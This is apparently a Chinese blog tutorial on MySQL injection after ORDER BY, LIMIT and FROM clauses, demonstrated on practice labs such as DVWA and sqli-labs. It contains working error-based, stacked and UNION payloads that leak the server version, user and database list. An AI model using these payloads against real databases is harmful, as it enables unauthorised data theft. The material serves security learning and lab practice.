关于MySQL注入点的问题

order by后注入

注入点在 order by后面,order by 后面不能带union select,此处可以利用报错信息进行注入

order by后不能参数化,不只order by,凡是字符串但又不能加引号的位置都不能参数化;包括sql关键字、库名表名字段名函数名等等,否则就会产生了语法错误

order by后不能参数化,可关注orderby、sort参数

desc或者asc(升序or降序排列)显示结果不同,则表明可以注入

mysql> select * from users order by 1 desc;

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

| user_id | first_name | last_name | user    | password                         | avatar                      | last_login          | failed_login |

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/smithy.jpg  | 2019-09-12 11:23:53 |            0 |

|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | /hackable/users/pablo.jpg   | 2019-09-12 11:23:53 |            0 |

|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | /hackable/users/1337.jpg    | 2019-09-12 11:23:53 |            0 |

|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-09-12 11:23:53 |            0 |

|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg   | 2019-10-06 14:59:01 |            8 |

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

5 rows in set (0.00 sec)
mysql> select * from users order by 1 asc;

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

| user_id | first_name | last_name | user    | password                         | avatar                      | last_login          | failed_login |

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg   | 2019-10-06 14:59:01 |            8 |

|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-09-12 11:23:53 |            0 |

|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | /hackable/users/1337.jpg    | 2019-09-12 11:23:53 |            0 |

|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | /hackable/users/pablo.jpg   | 2019-09-12 11:23:53 |            0 |

|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/smithy.jpg  | 2019-09-12 11:23:53 |            0 |

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

5 rows in set (0.00 sec)
select * from users order by 1 and (extractvalue(1,concat(0x3a,version())),1);


mysql> select * from users order by 1 and (extractvalue(1,concat(0x3a,version())),1);

ERROR 1105 (HY000): XPATH syntax error: ':8.0.12'


mysql> select * from users order by 1 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1);

ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'


sqli-labs第46关有order注入,感兴趣的可以自己试试


limit后注入

方法仅适用于5.0.0<mysql<5.6.6的版本

使用PROCEDURE ANALYSE 配合报错注入

select * from users limit 0,2 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

堆叠注入也可以

mysql> select * from users limit 0,2;show databases;

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

| user_id | first_name | last_name | user    | password                         | avatar                      | last_login          | failed_login |

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg   | 2019-10-06 14:59:01 |            8 |

|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-09-12 11:23:53 |            0 |

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

2 rows in set (0.00 sec)



+--------------------+

| Database           |

+--------------------+

| bwapp              |

| challenges         |

| dvwa               |

| information_schema |

| mysql              |

| performance_schema |

| pikachu            |

| pkxss              |

| root               |

| security           |

| sys                |

+--------------------+

14 rows in set (0.00 sec)






from 后面的注入

结合 order by 猜测列数,然后使用联合注入来注入

mysql> select * from users order by 8;

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

| user_id | first_name | last_name | user    | password                         | avatar                      | last_login          | failed_login |

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-09-12 11:23:53 |            0 |

|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | /hackable/users/1337.jpg    | 2019-09-12 11:23:53 |            0 |

|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | /hackable/users/pablo.jpg   | 2019-09-12 11:23:53 |            0 |

|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/smithy.jpg  | 2019-09-12 11:23:53 |            0 |

|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg   | 2019-10-06 14:59:01 |            8 |

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

5 rows in set (0.00 sec)



mysql> select * from users union select 1,2,3,4,user(),6,7,8;

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

| user_id | first_name | last_name | user    | password                         | avatar                      | last_login          | failed_login |

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg   | 2019-10-06 14:59:01 |            8 |

|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-09-12 11:23:53 |            0 |

|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | /hackable/users/1337.jpg    | 2019-09-12 11:23:53 |            0 |

|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | /hackable/users/pablo.jpg   | 2019-09-12 11:23:53 |            0 |

|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/smithy.jpg  | 2019-09-12 11:23:53 |            0 |

|       1 | 2          | 3         | 4       | root@localhost                   | 6                           | 7                   |            8 |

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

6 rows in set (0.00 sec)
已标记关键词 清除标记
©️2020 CSDN 皮肤主题: 黑客帝国 设计师:白松林 返回首页